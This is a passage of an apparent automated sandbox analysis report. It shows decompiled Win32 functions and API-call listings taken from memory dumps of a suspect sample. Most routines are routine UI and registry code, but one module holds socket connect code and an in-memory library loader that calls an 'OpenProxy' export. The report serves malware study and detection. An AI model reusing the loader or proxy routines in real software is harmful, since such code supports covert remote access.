						_t19 =  *((intOrPtr*)( *_t50 + 0x120))();
						__eflags = _t19;
						_t38 = _t50;
						_pop(_t51);
						if(_t19 != 0) {
							_t52 = _t38;
							_t20 =  *(_t52 + 0x64);
							__eflags = _t20;
							if(_t20 == 0) {
								_pop(_t51);
								goto L11;
							} else {
								__eflags = _t20 - 0x3f107;
								if(__eflags != 0) {
									_t30 = E0040E67F(_t33, _t44, _t52, __eflags);
									_t20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t30 + 4)))) + 0xac))( *(_t52 + 0x64), 1);
								}
								return _t20;
							}
						} else {
							L11:
							_push(_t38);
							_push(_t33);
							_push(0);
							_push(_t51);
							_push(_t44);
							_v4 = _t38;
							_t21 = GetCapture();
							while(1) {
								_t45 = _t21;
								__eflags = _t45;
								if(_t45 == 0) {
									break;
								}
								_t22 = SendMessageA(_t45, 0x365, 0, 0);
								__eflags = _t22;
								if(__eflags != 0) {
									L26:
									return _t22;
								} else {
									_t21 = E004120F3(0x365, _t41, _t45, __eflags, _t45);
									continue;
								}
								goto L32;
							}
							_t23 = GetFocus();
							while(1) {
								_t47 = _t23;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t22 = SendMessageA(_t47, 0x365, 0, 0);
								__eflags = _t22;
								if(__eflags != 0) {
									goto L26;
								} else {
									_t23 = E004120F3(0x365, _t41, _t47, __eflags, _t47);
									continue;
								}
								goto L32;
							}
							_t36 = _v4;
							_t24 = E00412138(_t36, _t41, _t47);
							__eflags = _t24;
							if(_t24 != 0) {
								_t25 = GetLastActivePopup( *(_t24 + 0x20));
								while(1) {
									_t48 = _t25;
									__eflags = _t48;
									_push(0);
									if(_t48 == 0) {
										break;
									}
									_t22 = SendMessageA(_t48, 0x365, 0, ??);
									__eflags = _t22;
									if(__eflags == 0) {
										_t25 = E004120F3(0x365, _t41, _t48, __eflags, _t48);
										continue;
									}
									goto L26;
								}
								_t22 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L26;
							} else {
								goto L9;
							}
						}
					} else {
						L9:
						_push(0);
						_push(_t36);
						_t4 =  &_v28; // 0x44e938
						_v28 = 0x44e9d0;
						E00429326(_t4, 0x448990);
						asm("int3");
						_t29 = _t36;
						 *((intOrPtr*)(_t29 + 4)) = 1;
						return _t29;
					}
				} else {
					if(_t16 != 0x3f107) {
						_push(1);
						_push(_t16);
						return  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xac))();
					}
					return _t16;
				}
				L32:
			}

APIs

GetCapture.USER32 ref: 0041688D
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 004168A6
GetFocus.USER32 ref: 004168B8
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 004168C4
GetLastActivePopup.USER32(?), ref: 004168EB
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 004168F6
SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 0041691A

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 378dcf6b78cd22f86acea8413c6056b380a06c6747d96687815af1eca11bacf4
Instruction ID: 5c2dc0a00ed5add7f97a7725997a504b21b63c5aa54729abf883310924c53915
Opcode Fuzzy Hash: 378dcf6b78cd22f86acea8413c6056b380a06c6747d96687815af1eca11bacf4
Instruction Fuzzy Hash: 55313471705214EBCA217B25DC44EFF7A9CEB85794B12443BF401D3251CB7ADC8296AA

Uniqueness

Uniqueness Score: -1.00%

Function 00410F70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410F70(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E0040D088();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E0040E6B2(1, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E004277B0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E00410D9E(_t61, _t72, GetWindowLongA, _t72, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E00410EBC(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

APIs

_memset.LIBCMT ref: 00410FFD
SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00411026
GetWindowLongA.USER32 ref: 00411038
GetWindowLongA.USER32 ref: 00411049
SetWindowLongA.USER32 ref: 00411065

Strings

(, xrefs: 0041101C

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 888d9f2d809782b9b02c8a71c4b322c8d455601fec8cf5b19a4fae9d80d48969
Instruction ID: ae21f0f8cb27eb3f74017b3a887ea3b18e191f315cd179c620a4cf385084f0aa
Opcode Fuzzy Hash: 888d9f2d809782b9b02c8a71c4b322c8d455601fec8cf5b19a4fae9d80d48969
Instruction Fuzzy Hash: 1031B231A007119FCB20AFB5D885AAABBE4BF08314F14052EF58197791DBB9E885CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041F59A, Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041F59A(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E00410E42(_t36, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E00415A74(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E0041F59A(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E00410E42(__ebx, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E0041F545(_t45, E00410E42(_t36, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E00410E42(_t36, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E00410E42(_t36, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}

APIs

GetWindow.USER32(?,00000002), ref: 0041F5B5
GetParent.USER32(?), ref: 0041F5C6
GetWindow.USER32(?,00000002), ref: 0041F5E9
GetWindow.USER32(?,00000002), ref: 0041F5FB
GetWindowLongA.USER32 ref: 0041F60A
IsWindowVisible.USER32(?), ref: 0041F624
GetTopWindow.USER32(?), ref: 0041F64A

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 78dc6faa9736ef45c17685ccc81277e86bc790b7bad95ceba6360fece9e43e69
Instruction ID: b8d643817d555e07fbd7c9f01348f0004d27e73c0f926a95db8431eb009d30a6
Opcode Fuzzy Hash: 78dc6faa9736ef45c17685ccc81277e86bc790b7bad95ceba6360fece9e43e69
Instruction Fuzzy Hash: 0721C432A007146BCB216A728C09FAB769CBF44754F05093EB945D7262DA2CDC8786AC

Uniqueness

Uniqueness Score: -1.00%

Function 10001736, Relevance: 10.6, APIs: 7, Instructions: 85networkCOMMON

Download Yara Rule

APIs

Part of subcall function 10001B2C: setsockopt.WS2_32(000000FF,0000FFFF,00000080,?,00000004), ref: 10001B51
Part of subcall function 10001B2C: CancelIo.KERNEL32(000000FF,?,?,?,100016E1,?,1000BE52), ref: 10001B5A
Part of subcall function 10001B2C: InterlockedExchange.KERNEL32(00000000,00000000), ref: 10001B66
Part of subcall function 10001B2C: closesocket.WS2_32(000000FF), ref: 10001B6F
Part of subcall function 10001B2C: SetEvent.KERNEL32(?,?,?,?,100016E1,?,1000BE52), ref: 10001B78

ResetEvent.KERNEL32(?,00001F91,?,00000000), ref: 10001749
socket.WS2_32(00000002,00000001,00000006), ref: 1000175A
gethostbyname.WS2_32(?), ref: 1000176B
htons.WS2_32(?), ref: 10001780
connect.WS2_32(?,00000002,00000010), ref: 1000179D
setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 100017C2
WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 100017F3

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
String ID:
API String ID: 4281462294-0
Opcode ID: 8a33164aee0335b4d5f902877d6efff41286bef5e3164e12e5e82e41c7f7b107
Instruction ID: 7c7760bc78449e009e4185d0531830c32e9eec3d11f4aebca18c5f09f5aa4b05
Opcode Fuzzy Hash: 8a33164aee0335b4d5f902877d6efff41286bef5e3164e12e5e82e41c7f7b107
Instruction Fuzzy Hash: D3216975500218BFE7109BA8CC85EEABBF8EF04394F104129F605A62A0D7B19A459B61

Uniqueness

Uniqueness Score: -1.00%

Function 10010ED5, Relevance: 10.6, APIs: 7, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010ED5(char* _a4, char* _a8) {
				char _v264;
				void _v524;
				long _t16;
				char* _t30;
				char* _t31;
				char* _t36;
				char* _t38;
				int _t40;
				void* _t41;

				_t30 = _a4;
				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
					CreateDirectoryA(_t30, 0);
				}
				_t36 = _a8;
				_t16 =  *_t36;
				if(_t16 != 0) {
					_t38 = _t36;
					_t31 = _t36;
					do {
						if(_t16 == 0x2f || _t16 == 0x5c) {
							_t38 = _t31;
						}
						_t3 =  &(_t31[1]); // 0x67e918c4
						_t16 =  *_t3;
						_t31 =  &(_t31[1]);
					} while (_t16 != 0);
					if(_t38 != _t36) {
						_t40 = _t38 - _t36;
						memcpy( &_v524, _t36, _t40);
						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
						E10010ED5(_t30,  &_v524);
					}
					_v264 = _v264 & 0x00000000;
					if(_t30 != 0) {
						strcpy( &_v264, _t30);
					}
					strcat( &_v264, _t36);
					_t16 = GetFileAttributesA( &_v264);
					if(_t16 == 0xffffffff) {
						return CreateDirectoryA( &_v264, 0);
					}
				}
				return _t16;
			}

0x10010edf
0x10010ee5
0x10010ef6
0x10010ef6
0x10010efc
0x10010eff
0x10010f03
0x10010f0a
0x10010f0c
0x10010f0e
0x10010f10
0x10010f16
0x10010f16
0x10010f18
0x10010f18
0x10010f1b
0x10010f1c
0x10010f22
0x10010f24
0x10010f2f
0x10010f34
0x10010f44
0x10010f49
0x10010f4c
0x10010f56
0x10010f60
0x10010f66
0x10010f6f
0x10010f7d
0x10010f86
0x00000000
0x10010f91
0x10010f86
0x10010f9a

APIs

GetFileAttributesA.KERNEL32(00000000,1002699C,1002699C), ref: 10010EE8
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 10010EF6
memcpy.MSVCRT ref: 10010F2F
strcpy.MSVCRT(00000000,00000000,1002699C,1002699C), ref: 10010F60
strcat.MSVCRT(00000000,10011208,1002699C,1002699C), ref: 10010F6F
GetFileAttributesA.KERNEL32(00000000,1002699C,1002699C), ref: 10010F7D
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 10010F91

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
String ID:
API String ID: 2935503933-0
Opcode ID: 0f3015c590dfa26e1d12bca52f8d1bb1169d8bab5d20888bc30277a2c650042f
Instruction ID: 2888606fe139821f6986f1748b15b8d31899b4ed0dabac74ece3a27f29fab791
Opcode Fuzzy Hash: 0f3015c590dfa26e1d12bca52f8d1bb1169d8bab5d20888bc30277a2c650042f
Instruction Fuzzy Hash: 87113A7690031C97DB30DA649CC9BDB7BACDB45260F5002A9F5E5EB482DBB0DDC68A20

Uniqueness

Uniqueness Score: -1.00%

Function 00416952, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416952(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x0041696d
0x00416974
0x00416977
0x0041697a
0x0041697d
0x00416988
0x004169bf
0x004169bf
0x004169ca
0x004169cf
0x004169cf
0x004169d4
0x004169d9
0x004169d9
0x004169e2

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00416980
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004169A3
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004169BF
RegCloseKey.ADVAPI32(?), ref: 004169CF
RegCloseKey.ADVAPI32(?), ref: 004169D9

Strings

software, xrefs: 00416968

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 826d9bf6b305cbf8591db89f374ef59254a87598c0183f29f21c651c40511bd6
Instruction ID: 8af83a5621ab3a8301aa803fae370240e64b790bf5af92e5a959bc19d5bc2dfd
Opcode Fuzzy Hash: 826d9bf6b305cbf8591db89f374ef59254a87598c0183f29f21c651c40511bd6
Instruction Fuzzy Hash: 1811F8B6D00118FBCB21DB9ADD84CDFBFBCEF89704F1000AAA500A2121D7709A55DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10004559, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10004559(void* _a4) {
				void* _t9;
				void* _t10;
				void* _t12;
				signed int _t14;
				intOrPtr* _t15;
				void* _t19;
				void* _t29;
				int _t32;

				if( *0x10027004 == 0) {
					_t29 = _a4 + 0x14;
					_t9 = E100012B3(_t29, 1);
					_t23 = _t29;
					_t19 = _t9;
					_t10 = E1000112E(_t29);
					memset(0x10026ac8, 0, 0x63);
					_t12 = memcpy(0x10026ac8, _t19, 0x63);
					_t32 = _t10 - 0xffffffffffffff9e;
					_push(_t32);
					L10015806();
					_a4 = _t12;
					memcpy(_t12, _t19 + 0x63, _t32);
					_t14 = E1000BF52(_a4);
					 *0x10027004 = _t14;
					if(_t14 != 0) {
						_t15 = E1000C385(_t23, _t14, "OpenProxy");
						 *_t15(0x10026ac8);
						E1000C410( *0x10027004);
					}
					if(_a4 != 0) {
						_push(_a4);
						L10015800();
					}
					 *0x10027004 =  *0x10027004 & 0x00000000;
				}
				return 0;
			}

0x10004563
0x1000456f
0x10004576
0x1000457b
0x1000457d
0x1000457f
0x10004591
0x1000459b
0x100045a1
0x100045a4
0x100045a5
0x100045b0
0x100045b3
0x100045bc
0x100045c4
0x100045cb
0x100045d3
0x100045d9
0x100045e1
0x100045e6
0x100045f0
0x100045f2
0x100045f5
0x100045fa
0x100045fb
0x100045fb
0x10004605

APIs

memset.MSVCRT ref: 10004591
memcpy.MSVCRT ref: 1000459B
#823.MFC42(-00000064), ref: 100045A5
memcpy.MSVCRT ref: 100045B3

Part of subcall function 1000BF52: VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,?,?,?,?,1000447D,?), ref: 1000BF86
Part of subcall function 1000BF52: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,?,?,1000447D,?), ref: 1000BF99
Part of subcall function 1000BF52: GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,?,?,1000447D,?), ref: 1000BFAD
Part of subcall function 1000BF52: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,1000447D,?), ref: 1000BFB4
Part of subcall function 1000BF52: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,1000447D,?), ref: 1000BFD5
Part of subcall function 1000BF52: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,1000447D,?), ref: 1000BFE6
Part of subcall function 1000BF52: memcpy.MSVCRT ref: 1000BFFD

#825.MFC42(00000000), ref: 100045F5

Part of subcall function 1000C385: _strcmpi.MSVCRT ref: 1000C3D0

Part of subcall function 1000C410: FreeLibrary.KERNEL32(?,00000000,?,00000000,?,1000C062,00000000), ref: 1000C44E
Part of subcall function 1000C410: free.MSVCRT(5E5FC78B,00000000,?,00000000,?,1000C062,00000000), ref: 1000C45D
Part of subcall function 1000C410: VirtualFree.KERNEL32(10778905,00000000,00008000,?,00000000,?,1000C062,00000000), ref: 1000C473
Part of subcall function 1000C410: GetProcessHeap.KERNEL32(00000000,1000C062,?,00000000,?,1000C062,00000000), ref: 1000C47B
Part of subcall function 1000C410: HeapFree.KERNEL32(00000000,?,1000C062,00000000), ref: 1000C482

Strings

OpenProxy, xrefs: 100045CD

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocVirtual$Heap$Freememcpy$Process$#823#825Library_strcmpifreememset
String ID: OpenProxy
API String ID: 2663202797-3566425383
Opcode ID: 73347fe1ba0d3e565c7c3bfe36f2f6fb200ec5c84a8858ce9d6290b14cb4555c
Instruction ID: d280342d3dfe99d647c1c7c9b0751304b96e8b2c625a08707d5624e13739c575
Opcode Fuzzy Hash: 73347fe1ba0d3e565c7c3bfe36f2f6fb200ec5c84a8858ce9d6290b14cb4555c
Instruction Fuzzy Hash: 321108B6500614BBF701DB70ECCAFAE3AA8EB01791F114025FA089A151DF759A4587E5

Uniqueness

Uniqueness Score: -1.00%

Function 00417161, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00417161(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E00429326(0, 0);
				_t22 = E00405670(__edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E00415804(_t33);
				}
				 *(_t41 + 0xc) = _t23;
				E004277B0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E004272B2(_t28);
			}

APIs

LeaveCriticalSection.KERNEL32(?), ref: 00417168
__CxxThrowException@8.LIBCMT ref: 00417172

Part of subcall function 00429326: RaiseException.KERNEL32(0040E68E,0040D295,00401099,00000000,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00429366

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000), ref: 00417189
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00417196

Part of subcall function 00415804: __CxxThrowException@8.LIBCMT ref: 00415818

_memset.LIBCMT ref: 004171B5
TlsSetValue.KERNEL32(?,00000000,00000000,8E7DE579), ref: 004171C6
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 004171E7

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: dbae14b3f866a3b207fbe93afc0cae5805417e8936c727a290b49233841e7172
Instruction ID: 715a94e063451aa5ad8dddd1738d3b02fe6788d279cb7c5db036e0dbf80938a1
Opcode Fuzzy Hash: dbae14b3f866a3b207fbe93afc0cae5805417e8936c727a290b49233841e7172
Instruction Fuzzy Hash: 83117C70A00605BFDB10AF65EC85D6BBBB5EF44318750C52AF40696661CB34AC90CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00420890, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420890(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x0042089a
0x004208a0
0x004208a7
0x004208ae
0x004208b5
0x004208c2
0x004208c9
0x004208cc
0x004208cf
0x004208d3

APIs

GetSysColor.USER32(0000000F), ref: 0042089C
GetSysColor.USER32(00000010), ref: 004208A3
GetSysColor.USER32(00000014), ref: 004208AA
GetSysColor.USER32(00000012), ref: 004208B1
GetSysColor.USER32(00000006), ref: 004208B8
GetSysColorBrush.USER32(0000000F), ref: 004208C5
GetSysColorBrush.USER32(00000006), ref: 004208CC

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: ddbef7d75fa9f72a11f9b6b5891b1d48bc5cbd90a84d0dcb73dff7d5adca9a9c
Instruction ID: 7261c17fb2df2ad4b797cb1e79a7fe258a1ec981dd2b06d9b767f77debf0a3b6
Opcode Fuzzy Hash: ddbef7d75fa9f72a11f9b6b5891b1d48bc5cbd90a84d0dcb73dff7d5adca9a9c
